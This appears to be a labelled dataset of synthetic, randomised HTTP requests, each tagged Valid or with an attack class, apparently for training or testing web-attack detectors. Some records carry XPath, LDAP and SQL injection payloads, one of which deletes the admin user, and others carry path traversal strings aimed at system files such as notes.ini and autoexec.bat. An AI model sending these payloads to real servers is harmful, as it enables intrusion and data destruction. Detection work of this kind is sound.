X-Serial-Number: 687925565922143
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28867
Start - Id: 35768
class: XPathInjection
GET /taqwV6tUt/drKYf2837l.js?xtermQUL2L=3+e4E&gnddmHnam9=%28i+++%3C++++count%28pdeFiT%2Fchild%3A%3Atext%28%29%29+++and+++j+%3C+count%28esnjL%2Fchild%3A%3Acomment%28%29%29+and++++k+++%3C++count%28ssErs%2Fchild%3A%3A*%29+++++%29 HTTP/1.0
Host: 80.203.70.250
Connection: keep-alive
Accept: text/*, audio/*;q=0.9, text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2y-mEao, ve-Enri, ssrenl-rne6OzPt, i-eqa;q=0.0
Cache-Control: no-transform
Client-ip: 75.114.245.20
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Fri, 24 Jun 05 16:28:54 GMT
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: 100-continue
From: Tzaa@hairs.be
If-Modified-Since: Thu, 19 Jul 07 21:32:04 GMT
If-Unmodified-Since: Thu, 08 Nov 07 05:21:28 CET
If-Match: *
If-None-Match: "3822oMSL5x3O8EPvF3I"
If-Range: "uYqCyPZHoc7kpuw"
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: Digest opaque="zteiR"
Range: 9042-41
Referer: /ezqhU.php
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/9.2 (Windows; U; Win98 3.2; fs-4i; rv:8.1.5) Gecko/43408576
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 1.3 251.181.165.92
Transfer-Encoding: deflate
Upgrade: sunttk/5.8, ubia/9.5, deoo/2.0, zOw/5.6, cxc/4.5
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35768
Start - Id: 16168
class: Valid
GET /wRBVninuvjrephgwxB/tArill6ae4thcd2.php4?dxyiPws6dst=9674957709&l7wzlradd3t=1nWyfLt&7nI=enwgfeyzd&cleeCmtmTdQm=ar&EfsamQHnc9NUininclude=sesna%3Baccepts9aehomehh&asdmpguy1=h4v_AnD_XXuP&Aa=7124559498&tsti=dnganodems&ndsA=oUdoMRWKHV98 HTTP/1.0
Host: 101.30.69.27
Connection: onentgso
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: urhoxsa-annyh, pEii2da-p, e-oott, ony5nap-jT;q=0.4, tg-2hirv
Cache-Control: dteisY6a='hxsaq'
Client-ip: 79.127.230.228
Cookie: Dosnmir=eeggtsDtauzeh1g;54s8fhpcaenu=eswos6yeOh8;oe2saiE6=5060;inhaOsnetptRaoo=71071;oiestertjt4toa=325643;eabfA0gbbut4nl=l49ajS
Cookie2: $Version="176"
Date: Wed, 15 Sep 04 22:21:53 CET
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: mEck5@aosi.it
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Tue, 26 Aug 08 15:26:52 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Dec 07 02:59:06 GMT
Max-Forwards: 854
MIME-Version: 7.0
Pragma: hrth=0qf02D
Proxy-Authorization: Digest username="nFeSct7"
Authorization: eTnft 6oio6=cetm
Range: -0401,-5888,85828-61
Referer: http://wjnao.fr/1xat.nsf
TE: deflate;q=0.6
Trailer: Accept-Encoding
User-Agent: i4fftplnht/2.5.6
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: FTP/7.0 www.e3upy9e.tiff, 1.5 193.84.239.182, 7h5cw/0.4 242.245.55.87
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 76018211526723
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16168
Start - Id: 29602
class: Valid
GET /EXcVRQ3gY9x/h4y@/gv9WmV9CdBVU.ul6X3Tj/pLIDt/jatG0RGXrDYHiOhoD/dniieta6/iq7kx7OgXELmncL/drhefllnzupA4VnynY.jpg?gihq=raTmhnaziz%29&tbl=91&1S.n6olu=9210765&ht0arhn9=uei8aae9dhnapE&ystjusRORgiwoei=s+s%5Bowinnt+o0&tsa1no=953263 HTTP/1.1
Host: 126.38.129.249:80
Connection: keep-alive
Accept: audio/*, video/*;q=0.9, video/*
Accept-Charset: gb2312;q=0.1, iso-10646-ucs-2;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: l7t5as-rtstu, ajo-e
Cache-Control: min-fresh=175
Client-ip: 140.155.217.246
Cookie: oSIjytt8s2slbI4=130;tLIt6sry=vm0x 7nxx
Cookie2: $Version="8"
Date: Fri, 01 Apr 05 24:00:22 CET
ETag: "L1FbUYuH@RPyinify"
Expect: ogprdfa
From: hk595Mi@tgQyreiAr.cz
If-Modified-Since: Sat, 12 Jan 08 11:16:50 CET
If-Unmodified-Since: Fri, 22 Sep 06 19:50:27 UTC
If-Match: "ZmXaHZfBMtfjvPw6LA"
If-None-Match: "nJp51q2c00S1dH3iLrzO"
If-Range: Tue, 30 Jun 09 04:28:04 CET
Max-Forwards: 7930
MIME-Version: 1.3
Pragma: rece=iNt
Proxy-Authorization: Basic ZWVzaHRnb2U6T2hvY2dKcw==
Authorization: Digest nonce
Range: -074,-900485
Referer: http://www.wHyy4Xh.org/AItpteea/iCn6lsy.php
TE: trailers,gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.5 (compatible; nsro; Open BSD i586; tcijLdbo4i; ptasnoaoU)
UA-CPU: StrongARM
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: rirsdh/4.7 www.feaQ5l.js
Transfer-Encoding: deflate
Upgrade: htrurs/2.1
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 41855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29602
Start - Id: 23942
class: Valid
GET /rzZi/9hrwsaoiq/gp.qNst/PrLCVw/eC/3ITp9zP/wNfholortt/6nkISsS3gRemmnarn.js? HTTP/1.1
Host: www.i5sl.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 237.51.196.149
Cookie: fEFrnlsn=wdzpg;Dfu=14617684
Cookie2: $Version="2"
Date: Thu, 25 Mar 04 12:08:53 GMT
ETag: W/"JhRUUOk2j3NFjJPyNbQn"
Expect: aandt
From: irliyiyI@8ciiyp.be
If-Modified-Since: Mon, 28 Apr 08 07:21:08 GMT
If-Unmodified-Since: Wed, 20 Dec 06 10:52:22 UTC
If-Match: *
If-None-Match: "H8e9cD.2zn9JdCTf"
If-Range: *
Max-Forwards: 952
MIME-Version: 1.7
Pragma: ebn4i='a'
Proxy-Authorization: ers8 j6eroeoe=halr4
Authorization: 4nUhyi Ooe4Y3ma=39tw6
Range: 074-7647,9-,-3
Referer: /Nbtr/nmee09yy/5hifbN/Risenrba.jpg
TE: deflate
Trailer: Accept-Encoding
User-Agent: fIzhsycepa (hV4ski; aMFtVNF)
UA-CPU: StrongARM
UA-Disp: 7033,058,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: ahta/6.0 www.Keermi.htm, HTTP/6.5 60.42.133.149:8652
Transfer-Encoding: gzip
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23942
Start - Id: 45105
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 40.113.35.209:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress, compress;q=0.7, gzip, gzip;q=0.6
Accept-Language: 2ddroR-BcmdDHse;q=0.7, tSjb6t-miaeiugi
Cache-Control: max-stale=44
Client-ip: 154.211.218.131
Cookie: sedtph=3
Cookie2: $Version="1"
Date: Mon, 31 Aug 09 13:37:37 GMT
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: cles=tnrrwes
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Thu, 04 Mar 04 04:16:35 CET
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "ksuzbOWJ_SPZ-KF"
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 80
MIME-Version: 4.2
Pragma: se5d='nnfSaPsE'
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: NTLM b2pNMDZlYWZvbjFqaXN1ZW1kZXJ3bmVSeWRyaWFhbWF0eGJpdHk=
Range: -3,456-488022
Referer: http://ci7jsem.it/steosie/tnhtotL.jpeg
TE: gzip
Trailer: Max-Forwards
User-Agent: eOosdcnddo (o.oxhn9)
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: iwry; op3ttF=ri0ttEhh
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45105
Start - Id: 36264
class: PathTransversal
POST /UvAnQVAstyle/aKDxl5TM/oF7.Mv80yWR7aJ/5entfgsHrarjnj0tho/kehdly/rr/eMJjF_smsU_arhehQyIk/l.DfGj5n4eWF2xWFh.gif? HTTP/1.0
Content-Length: 89
Content-Language: pmot,uno,8w
Content-Encoding: identity
Content-Location: http://www.teoaoe.uk/pxdmtnen/habtah/qnnir.pdf
Content-MD5: cmFvZmdvYWk3ZXRlaWV5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Jan 05 10:33:16 GMT
Last-Modified: Sat, 10 May 08 07:50:45 UTC
Host: 183.231.91.15
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="90"
Date: Fri, 07 Sep 07 17:46:02 CET
ETag: W/"oOCb5nZctRT5ek672"
Expect: 100-continue
From: h4lVt@earfemtsac.org
If-Modified-Since: Mon, 11 Jan 10 04:45:38 GMT
If-Unmodified-Since: Mon, 28 Jan 08 19:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 84
MIME-Version: 4.1
Pragma: at='lribde'
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: /5ecmna/0lepoo/7a7suA1.doc
TE: trailers,chunked
Trailer: Via
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 3.6; 6u-Gi; rv:2.0.7) Gecko/03693279
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: i2m/4.5 www.hrf6lnaE.tiff, 0.4 237.135.7.15
Transfer-Encoding: lealek
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

hiidc4dccrt5Tpi=\.\.\/\.\.\/etc\/qkwmce.conf&wtahintyerirE=nTlgJ-e3mQ

End - Id: 36264
Start - Id: 49645
class: XPathInjection
GET /3VeJrEDl9iG/i-rQCNbDsl.ih5yM3/thk4JuSUaD.jpg?sg=ehperl&oi=%3DiPlxetl5&OLoo7antavsh=5283&hayrnLiuxaarsa=r8TcE&e8eh1=yAhEgi%27++or+8hS%2Fnbjfe%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D99%5D+++or++++%27sren%27++++%3D+++%27&zorran=ctadminchy6fot3oa&ftHesydjco=147&PFzj=nir02d HTTP/1.0
Host: 18.218.160.23
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: lNibiram-car3, zX-nia6, hl7ge-iuWsmoq;q=0.2
Cache-Control: no-transform
Client-ip: 18.132.255.142
Cookie: 8FlI=217600;stik0h50ohonl=yooonMkdVa;tua=8
Date: Sun, 03 May 09 22:40:51 UTC
ETag: "N6bqFN-@jrPmqq@GH"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Sun, 26 Sep 04 07:25:34 UTC
If-Match: "z1epBmyufILgw7LQ"
If-None-Match: "y@gyu40UFW2RU@gHub"
If-Range: *
Max-Forwards: 5921
MIME-Version: 7.8
Pragma: toS=teenfHn
Proxy-Authorization: NTLM ZXR4Y2FuZmVyZ2lzdUVlbnRzYUJIZWdqWmhua2VwZTFlZXNt
Authorization: 7busio isi7wte=S6aeu
Referer: http://ieaeee.com/ssycIiz/e7rt/h4nf.gif
TE: trailers,gzip;q=0.6
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 4.2; ib-in; rv:8.6.3) Gecko/44649971
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: identity
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49645
Start - Id: 45481
class: PathTransversal
GET /andyGazmJ4wuVbI7/afh8/6sunoftarhAn2de/nulle5/cd98vthbnp8btx7nf/aondqdlboxgmaarig/formd2F50gautoexec5T4child8D/ewD.tMQVSX.n-VVuN/ofC2MCl4K5N/ebM0Od@D-m/jiinsT.dll?cte0h2pocgtesM=fjw7p&8eqdni=au8cZnAA&OedW=f51fL-M&vnb6yryrvrhm=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&iai=tDOSlQPEwRZ&hasheoOst6=c1deemasa HTTP/1.1
Host: 56.178.74.196
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 53.223.189.118
Cookie: secnicreeaost=tF;eeneruyhntdsr=yhae;hwo=4382169;SlE=OwaT0a1teameojoirt
Cookie2: $Version="012"
Date: Sun, 15 Oct 06 01:10:53 CET
ETag: "Xr8lGVgegTZoE1lXftNv"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 30 May 09 22:19:40 CET
If-Unmodified-Since: Fri, 28 Oct 05 13:38:48 CET
If-Match: "4lGHrAzX1DOkcv1tr"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: "rgZQet-ieYkBo4g"
Max-Forwards: 7
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: Basic aGlqNmNzOmhkc3hvaHdl
Range: 7-
Referer: /Fe6seesU/tlrrle/toowliee/6evcMm.asp
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 3.2; Su-ao; rv:1.2.0) Gecko/52377298
UA-CPU: x86
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45481
Start - Id: 49296
class: XPathInjection
GET /toxrtsqs9oQ4ohop/ad9HO/eofAs1ihie3s8ioaqsu/0AsRnth6/a9eoeoioI.exe?OFCU=%28i+++++%3C++count%28LOdhor%2Fchild%3A%3Atext%28%29%29+++++and+++j+++%3C+++++count%28car%2Fchild%3A%3Acomment%28%29%29+++and+++++k+++%3C+++++count%28jseuv%2Fchild%3A%3A*%29+++%29&isc1ctci=%2Bletei4e&3rrddohs6h=ti%24loy0ii&EkiG.P_DU4bv=0oa&pjsh8ah=uR8gmQwm60B HTTP/1.1
Host: 240.65.107.42:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: thts='rteo'
Client-ip: 248.142.244.103
Cookie: Epjkiwel3z2=ola1e1Epe;2t3GOi1IaDeyEh=1273
Cookie2: $Version="213"
Date: Sun, 10 Jul 05 05:36:35 GMT
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 05 Jun 04 12:46:25 CET
If-Unmodified-Since: Thu, 26 May 05 06:10:19 CET
If-Match: "h.EAPtYo7V.8JSq0r"
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic b2hhaFRhOjJwbGVoZg==
Range: -4
Referer: http://www.o7Ie.ch/toart/ve6t/lrzo/mk7nahno.php4
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 5.2; wU-lt; rv:7.9.6) Gecko/18816860
UA-CPU: PowerPC
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7516x496
Via: eno/0.7 www.f7tStdd.css, 9.1 37.14.253.3, HTTP/8.1 www.drtvi6.jpg
Transfer-Encoding: compress
Upgrade: kefEa/0.4, sicxsn/0.6, oeAol/1.0, tMesla/8.7
Warning: 172 140.116.163.38:5 "oRfa" 
X-Forwarded-For: 104.98.97.132
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49296
Start - Id: 11003
class: Valid
GET /rrer2h07maoAio/T8.GXFUcopyXYgf/t09/ctisrpt/Msh-WO1.x/lPwBK1p8Nsa4/io_0/l@FIFYB7cW8KaxtzvBT/yRiuCeeosip/apnttlnehsagtlm/childwp-kr_KCuaccess_logP@lRbI/aEo666nU93AnbKN1Caq.shtml?aaTti=poU&refzewo5=3611589&oKlqht9hinrt=eSs&oapets5Aaso=gdetci1hhan&w@iobjectczoA=4o2wmtot%2Fhttps&eno3aqdsjhp=140563 HTTP/1.0
Host: 136.64.44.252
Connection: pCfa8irr
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nPt-kr9totO;q=0.9, 3Do-mnqsr;q=0.8, lsa-1azuhwn, He9elin-hudi7y;q=0.4
Cache-Control: max-age=259
Client-ip: 116.200.251.242
Cookie: a5=ttcnfeKeEahsystemsHpya
Cookie2: $Version="9"
Date: Fri, 14 Apr 06 13:27:31 CET
ETag: "iQfD58USLgrSmKWyKC"
Expect: aeeo7Dei=wsbejae;nipawec
From: Oimrip@itut.fr
If-Modified-Since: Fri, 13 Nov 09 16:25:36 CET
If-Unmodified-Since: Sat, 02 Aug 08 03:54:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 17 Mar 06 02:49:20 GMT
Max-Forwards: 96
MIME-Version: 9.8
Pragma: atsoss='Mizeaaa'
Proxy-Authorization: Digest qop=kimet5
Authorization: Basic Tm5tMHNlb2I6c3doc3RpaQ==
Range: 68-612
Referer: /naiga/edcshot/dsaitf/ssar.gif
TE: chunked;q=0.2,chunked,gzip;q=0.2
Trailer: Date
User-Agent: bPJNtu http://www.5mrgeua.be
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 124x705
Via: abh/4.8 www.eaA59.gif:88148, HTTP/3.0 www.il54fecp.jpg
Transfer-Encoding: deflate
Upgrade: Enfrte/3.8, el1/4.8, i8r/0.7, 7AJjip/7.1
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11003
Start - Id: 14152
class: Valid
GET /a8rnw2/eOfAbCY42/Y5SbMmkRBY.jpg?sp0tisd97=q-p6KYwdsL&-RbinlEBOGo=zeo8xerhY&kdun=swdl_A&veytcEErif=w0ixrf%40+nlsEd%27r&ra=wotqdktbkeyL&8bVT=t7I&uykrnw=6&HdbshutdownrZ1b.ZJ=5aifhosaiupc4Aa HTTP/1.0
Host: 140.201.242.80:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312;q=0.0, iso-8859-2;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: sinfh6-arho0tos, ofwonm-RoMaitr;q=0.1
Cache-Control: max-stale
Client-ip: 153.229.137.71
Cookie: cdtefo=l-MeV;irotc=qnd
Cookie2: $Version="66"
Date: Tue, 19 Sep 06 10:37:17 GMT
ETag: "UEVmFw97@yrz7UMGZmRF"
Expect: XTCr
From: zess@lSzAtt.de
If-Modified-Since: Wed, 21 Mar 07 09:04:36 CET
If-Unmodified-Since: Thu, 11 May 06 24:38:02 GMT
If-Match: "6Rou@m2lu83M6UltRI"
If-None-Match: *
If-Range: Thu, 01 Jan 09 03:37:01 UTC
Max-Forwards: 763
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic TGJyc3I6N281ZTRycw==
Authorization: Digest uri=/7cii5/Naouo7.pdf
Range: -395
Referer: http://www.Dt2eey8v.cz/3sthiso/sreej/D9isiisn.jsp
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 3.2; En-bc; rv:3.0.8) Gecko/60889466
UA-CPU: x86
UA-Disp: 946,473,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5343x014
Via: FTP/5.5 www.teba.js, HTTP/8.0 www.egnF.js, 4.4 www.fmeeyett.gif
Transfer-Encoding: compress
Upgrade: icGe/0.3
Warning: 166 42.97.253.158 "rwatpa" 
X-Forwarded-For: 126.23.131.140
X-Serial-Number: 8863769
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14152
Start - Id: 38073
class: LdapInjection
GET /rm3ZKFGxtermu/yOHQq5FfD2v-FujxcZ-/iB2wAclH1AEadB7UdKJv/dkFNG0iuAGG.mspx?srnz=%2B2h9nijtolsxp_&talwh=5&RFform2uJkQ4J=nagwafeweodq&Nya=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&wa4NRUut=ehc+4x%5B%3Crallpi HTTP/1.1
Host: www.ttrd.com:3666
Connection: 4Eime
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 218.10.109.173
Cookie: mistbNhDto4=gr;is8iyora=%a;6tfobokttex=0680
Cookie2: $Version="57"
Date: Fri, 07 Apr 06 12:08:50 CET
ETag: W/"D8v7C-3-pg8qmVMX1v"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Mon, 26 Oct 09 16:20:08 CET
If-Unmodified-Since: Fri, 24 Mar 06 21:58:09 CET
If-Match: *
If-None-Match: "RvaqxOEiQLE5AIs9AP"
If-Range: "FmJxizBZzLrlYbp@efNj"
Max-Forwards: 96
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic TW9nTG86YWQ2aWhp
Range: 77-,76-
Referer: /sdeni.cgi
TE: trailers,deflate
Trailer: Accept
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 9.3; rl-eH; rv:1.5.1) Gecko/66755576
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0762x683
Via: eesaT9/1.2 www.iu4tgi.html, 9.6 www.I2srcoiS.jpeg
Transfer-Encoding: identity
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 36.56.242.165
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38073
Start - Id: 27461
class: Valid
GET /Dr/otdJgwcrgoofee5i/popth1CEv9.wgetpositionQhb/4s0v_7q/DnfK7divhbgsoundPMl/eu2ybjq9N/doHunn3Ea4/mzZ.php? HTTP/1.0
Host: 255.195.236.116:4
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 102.242.35.241
Cookie: cep4=fx;oet=i7dIorde;3ns9BgueH=ubinfwgetaccept;wp-@2435UwXQZ=s;tegpevndnh=167;wsgaegtsnon=tELWJZw@
Cookie2: $Version="8"
Date: Sat, 23 Jun 07 04:54:35 UTC
ETag: "QtIOcNrTHUCZCQr"
Expect: 100-continue
From: lnoa@mkfNdbdI2t.de
If-Modified-Since: Tue, 07 Mar 06 21:37:13 UTC
If-Unmodified-Since: Thu, 02 Oct 08 13:50:10 GMT
If-Match: *
If-None-Match: "vlt8.YalQQXV2Bz"
If-Range: *
Max-Forwards: 7787
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM dXRlZHduZW51Z2NybUszdW5vYWJ0c25yYWF4eWFyb2U=
Authorization: Basic YTh1cnQ6MTNpZGFj
Range: 0621-4596,-0
Referer: http://I7rube8.uk/nsic/dediscl.swf
TE: trailers,trailers
Trailer: TE
User-Agent: egrr (i3bejKc; 2lUZ_8; eYPqfuLRD; riLwXWApq; thBEub5)
UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 802x162
Via: FTP/5.6 www.Dih1jc9.gif
Transfer-Encoding: sasups
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 71071615969288398
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27461
Start - Id: 35322
class: SqlInjection
GET /hlsmrmTZciMAugvG/o@PlonZz9qYF/ma7r2sapeeaah/ptiitb0Cmo/uKMHVhTwayHDP.5n0.aspx?ruhadhpGe5tIr=sradcte%27%29%3BDELETEFROMusersWHEREupper%28username%29+%3Dupper%28%27admin HTTP/1.0
Host: www.BUoaTntttD.net
Connection: oc2atk
Accept: text/plain, application/zip, video/*
Accept-Charset: euc-tw;q=0.5
Accept-Encoding: gzip;q=0.3, deflate;q=0.6, identity;q=0.9, compress;q=0.9, identity;q=0.1
Accept-Language: 8rteoe-u;q=0.5, T-u;q=0.6
Cache-Control: no-transform
Client-ip: 89.110.200.190
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="53"
Date: Thu, 16 Apr 09 24:06:10 GMT
ETag: W/"mz5K4DQH@Xm5ZhfU4"
Expect: 100-continue
From: sRnmsR@sengsHda.net
If-Modified-Since: Sun, 30 Nov 08 22:21:17 CET
If-Unmodified-Since: Thu, 28 Jul 05 09:37:58 CET
If-Match: *
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 5063
MIME-Version: 4.0
Pragma: a='6ode'
Proxy-Authorization: Digest nc=0A24AbAd
Authorization: Basic cnVkeWRvZWY6bjBjZXR0
Range: 9898-,30840-71
Referer: http://0erelym.biz/lahd/aeetL/qeseihAi.jpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.5 (compatible; Konqueror/5.0; SunOS sun4u; m6puB; conss1i; 5dlnid)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
